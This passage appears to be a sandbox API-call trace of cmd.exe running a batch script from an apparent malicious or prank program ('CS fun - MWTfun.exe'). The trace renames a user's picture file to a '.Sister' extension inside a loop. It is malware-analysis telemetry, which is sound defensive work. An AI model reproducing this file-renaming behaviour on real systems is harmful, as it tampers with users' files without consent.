lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.705] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.706] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.706] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.706] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.715] longjmp () [0293.715] ??_V@YAXPEAX@Z () returned 0x1 [0293.715] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="qH5GV-YJCqquRIYDQ_S.png", cAlternateFileName="")) returned 1 [0293.715] GetProcessHeap () returned 0x21ed8c70000 [0293.715] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x18a) returned 0x21ed8c72790 [0293.715] GetProcessHeap () returned 0x21ed8c70000 [0293.715] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x18a [0293.715] GetProcessHeap () returned 0x21ed8c70000 [0293.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93161a0 [0293.716] GetProcessHeap () returned 0x21ed8c70000 [0293.716] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93161a0, Size=0x30) returned 0x21ed93161a0 [0293.716] GetProcessHeap () returned 0x21ed8c70000 [0293.716] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93161a0) returned 0x30 [0293.716] GetProcessHeap () returned 0x21ed8c70000 [0293.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93161e0 [0293.716] malloc (_Size=0x1ff9c) returned 0x21ed98ff980 [0293.717] GetProcessHeap () returned 0x21ed8c70000 [0293.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7be90 [0293.717] ??_V@YAXPEAX@Z () returned 0x1 [0293.717] GetProcessHeap () returned 0x21ed8c70000 [0293.717] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93161e0, Size=0x1f0) returned 0x21ed93161e0 [0293.717] GetProcessHeap () returned 0x21ed8c70000 [0293.717] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93161e0) returned 0x1f0 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93163e0 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93163e0, Size=0x290) returned 0x21ed93163e0 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93163e0) returned 0x290 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9316680 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9316680, Size=0x30) returned 0x21ed9316680 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9316680) returned 0x30 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93166c0 [0293.718] malloc (_Size=0x1ff9c) returned 0x21ed98ff980 [0293.718] GetProcessHeap () returned 0x21ed8c70000 [0293.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bfd0 [0293.718] ??_V@YAXPEAX@Z () returned 0x1 [0293.718] malloc (_Size=0x1ff9c) returned 0x21ed98ff980 [0293.718] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7780 [0293.719] FindClose (in: hFindFile=0x21ed8cc7780 | out: hFindFile=0x21ed8cc7780) returned 1 [0293.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc8380 [0293.719] FindClose (in: hFindFile=0x21ed8cc8380 | out: hFindFile=0x21ed8cc8380) returned 1 [0293.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9a5963d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9a5963d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc8080 [0293.719] FindClose (in: hFindFile=0x21ed8cc8080 | out: hFindFile=0x21ed8cc8080) returned 1 [0293.720] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x4, dwReserved1=0x7, cFileName="qH5GV-YJCqquRIYDQ_S.png", cAlternateFileName="QH5GV-~1.PNG")) returned 0x21ed8cc80e0 [0293.720] FindClose (in: hFindFile=0x21ed8cc80e0 | out: hFindFile=0x21ed8cc80e0) returned 1 [0293.720] _wcsnicmp (_String1="QH5GV-~1.PNG", _String2="qH5GV-YJCqquRIYDQ_S.png", _MaxCount=0x17) returned 5 [0293.720] malloc (_Size=0x1ff9c) returned 0x21ed991f930 [0293.721] ??_V@YAXPEAX@Z () returned 0x21ed991f930 [0293.722] GetProcessHeap () returned 0x21ed8c70000 [0293.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8910 [0293.722] ??_V@YAXPEAX@Z () returned 0x1 [0293.722] ??_V@YAXPEAX@Z () returned 0x1 [0293.722] GetProcessHeap () returned 0x21ed8c70000 [0293.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93166c0, Size=0x1f0) returned 0x21ed93166c0 [0293.722] GetProcessHeap () returned 0x21ed8c70000 [0293.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93166c0) returned 0x1f0 [0293.722] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.723] GetFileType (hFile=0x50) returned 0x2 [0293.723] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.723] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.723] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.730] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.730] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.730] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.730] GetFileType (hFile=0x50) returned 0x2 [0293.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.730] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.731] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.731] GetFileType (hFile=0x50) returned 0x2 [0293.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.732] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93161b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93161b0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"qH5GV-YJCqquRIYDQ_S.png\" \"qH5GV-YJCqquRIYDQ_S.png.Sister\" ") returned 60 [0293.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.733] GetFileType (hFile=0x50) returned 0x2 [0293.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.733] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.733] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0293.734] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.734] GetFileType (hFile=0x50) returned 0x2 [0293.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.734] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.734] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.736] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.736] GetFileType (hFile=0x50) returned 0x2 [0293.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.736] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.737] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.737] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.737] GetFileType (hFile=0x50) returned 0x2 [0293.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.737] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.738] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.738] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.738] GetFileType (hFile=0x50) returned 0x2 [0293.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.738] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.739] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.747] GetFileType (hFile=0x50) returned 0x2 [0293.748] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.748] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.748] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9316690*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9316690*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.749] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.bat\" ") returned 60 [0293.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.749] GetFileType (hFile=0x50) returned 0x2 [0293.749] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.749] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.749] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0293.753] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.753] GetFileType (hFile=0x50) returned 0x2 [0293.753] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.753] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.755] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.755] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.760] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.760] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.760] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.760] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.760] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.760] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.760] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.760] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.760] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.760] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.760] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.760] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.760] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.760] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.760] ??_V@YAXPEAX@Z () returned 0x1 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed8d6afd0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6afd0, Size=0x88) returned 0x21ed8d6afd0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6afd0) returned 0x88 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d656b0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed8c758a0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x88) returned 0x21ed8c758a0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x88 [0293.761] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.761] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc79c0 [0293.761] GetProcessHeap () returned 0x21ed8c70000 [0293.761] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9302940 [0293.761] _wcsicmp (_String1="qH5GV-YJCqquRIYDQ_S.png", _String2=".") returned 67 [0293.762] _wcsicmp (_String1="qH5GV-YJCqquRIYDQ_S.png", _String2="..") returned 67 [0293.762] GetFileAttributesW (lpFileName="qH5GV-YJCqquRIYDQ_S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png")) returned 0x20 [0293.762] GetProcessHeap () returned 0x21ed8c70000 [0293.762] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93168c0 [0293.763] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93168d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.763] SetErrorMode (uMode=0x0) returned 0x0 [0293.763] SetErrorMode (uMode=0x1) returned 0x0 [0293.763] GetFullPathNameW (in: lpFileName="qH5GV-YJCqquRIYDQ_S.png", nBufferLength=0x7fe7, lpBuffer=0x21ed98ff980, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png", lpFilePart=0xa6cf4fd660*="qH5GV-YJCqquRIYDQ_S.png") returned 0x30 [0293.763] SetErrorMode (uMode=0x0) returned 0x1 [0293.763] GetProcessHeap () returned 0x21ed8c70000 [0293.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9304410 [0293.763] _wcsicmp (_String1="qH5GV-YJCqquRIYDQ_S.png", _String2=".") returned 67 [0293.763] _wcsicmp (_String1="qH5GV-YJCqquRIYDQ_S.png", _String2="..") returned 67 [0293.763] GetFileAttributesW (lpFileName="qH5GV-YJCqquRIYDQ_S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png")) returned 0x20 [0293.765] ??_V@YAXPEAX@Z () returned 0x1 [0293.765] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.765] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.765] malloc (_Size=0xffce) returned 0x21ed990f960 [0293.765] ??_V@YAXPEAX@Z () returned 0x21ed990f960 [0293.766] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png")) returned 0x20 [0293.766] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.766] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.766] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png", fInfoLevelId=0x1, lpFindFileData=0x21ed9302950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9302950) returned 0x21ed8cc7d20 [0293.766] malloc (_Size=0xffce) returned 0x21ed992f920 [0293.766] ??_V@YAXPEAX@Z () returned 0x21ed992f920 [0293.767] ??_V@YAXPEAX@Z () returned 0x1 [0293.767] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.768] FindNextFileW (in: hFindFile=0x21ed8cc7d20, lpFindFileData=0x21ed9302950 | out: lpFindFileData=0x21ed9302950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qH5GV-YJCqquRIYDQ_S.png", cAlternateFileName="")) returned 0 [0293.769] GetLastError () returned 0x12 [0293.769] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0293.770] ??_V@YAXPEAX@Z () returned 0x1 [0293.770] ??_V@YAXPEAX@Z () returned 0x1 [0293.770] ??_V@YAXPEAX@Z () returned 0x1 [0293.770] ??_V@YAXPEAX@Z () returned 0x1 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc82c0 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c959a0, Size=0x16) returned 0x21ed8c95840 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45d40, Size=0x20) returned 0x21ed8d45c20 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c20) returned 0x20 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bda0 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bda0, Size=0xb2) returned 0x21ed937b4b0 [0293.770] GetProcessHeap () returned 0x21ed8c70000 [0293.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b4b0) returned 0xb2 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93268b0 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93268b0, Size=0x30) returned 0x21ed93268b0 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, 